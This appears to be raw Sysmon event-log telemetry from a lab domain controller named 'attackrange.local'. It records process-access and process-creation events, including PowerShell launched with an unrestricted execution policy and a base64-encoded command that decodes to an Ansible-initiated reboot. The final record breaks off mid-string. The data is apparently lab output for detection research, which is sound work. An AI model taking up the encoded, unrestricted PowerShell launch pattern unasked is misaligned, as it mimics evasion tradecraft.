08:40:27.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.837{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.821{5D479F2C-167B-5F84-1303-000000007E01}45084752C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+362f32a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35794133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35793e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+36245469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3575499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+357b2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+357964ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+357964ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3579635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+357882e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35794817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3579440a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35794133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35793e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+36245469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3577ac65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+3577a235(wow64) 154100x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.836{5D479F2C-167B-5F84-1403-000000007E01}1496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.774{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.774{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.743{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_okhk4ylk.jcl.ps12020-10-12 08:40:27.743 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.728{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-167B-5F84-1203-000000007E01}40324428C:\Windows\system32\cmd.exe{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.712{5D479F2C-167B-5F84-1303-000000007E01}4508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEA